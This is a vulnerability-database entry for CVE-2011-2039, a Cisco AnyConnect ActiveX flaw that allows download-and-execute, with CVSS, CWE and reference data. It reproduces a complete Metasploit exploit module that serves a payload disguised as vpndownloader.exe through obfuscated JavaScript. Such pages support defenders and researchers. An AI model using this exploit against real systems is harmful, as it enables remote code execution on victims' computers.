English
Français
Light
Dark
System

Alert System

Stay informed at all times
Create an account Open a free account Login Manage your alerts

CVE-2011-2039 : Detail

CVE-2011-2039

A03-Injection
78.19%V3
Network
2011-06-02 17:00 +00:00
2017-08-28 10:57 +00:00
CVE.org
NVD

Alert for a CVE

Stay informed of any changes for a specific CVE.
Alert management

Descriptions

The helper application in Cisco AnyConnect Secure Mobility Client (formerly AnyConnect VPN Client) before 2.3.185 on Windows, and on Windows Mobile, downloads a client executable file (vpndownloader.exe) without verifying its authenticity, which allows remote attackers to execute arbitrary code via the url property to a certain ActiveX control in vpnweb.ocx, aka Bug ID CSCsy00904.

Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-20 Improper Input Validation
The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.

Metrics

Metric Score Severity CVSS Vector Source
V2 7.6 AV:N/AC:H/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 17366

Publication date : 2011-06-05 22:00 +00:00
Author : Metasploit
EDB Verified : Yes

## # $Id: cisco_anyconnect_exec.rb 12872 2011-06-06 20:15:51Z bannedit $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute', 'Description' => %q{ This module exploits a vulnerability in the Cisco AnyConnect VPN client vpnweb.ocx ActiveX control. This control is typically used to install the VPN client. An attacker can set the 'url' property which is where the control tries to locate the files needed to install the client. The control tries to download two files from the site specified within the 'url' property. One of these files it will be stored in a temporary directory and executed. }, 'License' => MSF_LICENSE, 'Author' => [ 'bannedit' ], 'Version' => '$Revision: 12872 $', 'References' => [ [ 'CVE', '2011-2039' ], [ 'OSVDB', '72714'], [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=909' ], [ 'URL', 'http://www.cisco.com/en/US/products/products_security_advisory09186a0080b80123.shtml'], ], 'Platform' => 'win', 'Targets' => [ [ 'Automatic', { 'Arch' => ARCH_X86 } ], ], 'DisclosureDate' => 'Jun 01 2011', 'DefaultTarget' => 0)) register_options( [ OptString.new('URIPATH', [ true, "The URI to use.", "/" ]) ], self.class) end def on_request_uri(cli, request) if request.uri.match(/vpndownloader\.exe/) exe = generate_payload_exe({:code => payload.encoded}) print_status("Client requested: #{request.uri}. Sending vpndownloader.exe") send_response(cli, exe, { 'Content-Type' => 'application/octet-stream' }) select(nil, nil, nil, 5) # let the file download handler(cli) return end if request.uri.match(/updates\.txt/) print_status("Client requested: #{request.uri}. Sending updates.txt") updates = rand_text_alpha((rand(500) + 1)) + "\n" + rand_text_alpha((rand(500) + 1)) send_response(cli, updates, { 'Content-Type' => 'text/plain' }) return end url = get_uri(cli) dir = rand_text_alpha((rand(40) + 1)) js = ::Rex::Exploitation::JSObfu.new %Q| var x = document.createElement("object"); x.setAttribute("classid", "clsid:55963676-2F5E-4BAF-AC28-CF26AA587566"); x.url = "#{url}/#{dir}/"; | js.obfuscate html = "\n\t\n" print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") send_response_html(cli, html) end end

Products Mentioned

Configuraton 0

Cisco>>Anyconnect_secure_mobility_client >> Version To (including) 2.3

Cisco>>Anyconnect_secure_mobility_client >> Version 2.0

Cisco>>Anyconnect_secure_mobility_client >> Version 2.1

Cisco>>Anyconnect_secure_mobility_client >> Version 2.2

Cisco>>Anyconnect_secure_mobility_client >> Version 2.2.128

Cisco>>Anyconnect_secure_mobility_client >> Version 2.2.133

Cisco>>Anyconnect_secure_mobility_client >> Version 2.2.136

Cisco>>Anyconnect_secure_mobility_client >> Version 2.2.140

Microsoft>>Windows >> Version *

Microsoft>>Windows_mobile >> Version *

References

http://osvdb.org/72714
Tags : vdb-entry, x_refsource_OSVDB
http://securityreason.com/securityalert/8272
Tags : third-party-advisory, x_refsource_SREASON
http://www.securitytracker.com/id?1025591
Tags : vdb-entry, x_refsource_SECTRACK
http://www.kb.cert.org/vuls/id/490097
Tags : third-party-advisory, x_refsource_CERT-VN
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=909
Tags : third-party-advisory, x_refsource_IDEFENSE

More information
Click on the button to the left (OFF), to authorize the inscription of cookie improving the functionalities of the site. Click on the button to the left (Accept all), to unauthorize the inscription of cookie improving the functionalities of the site.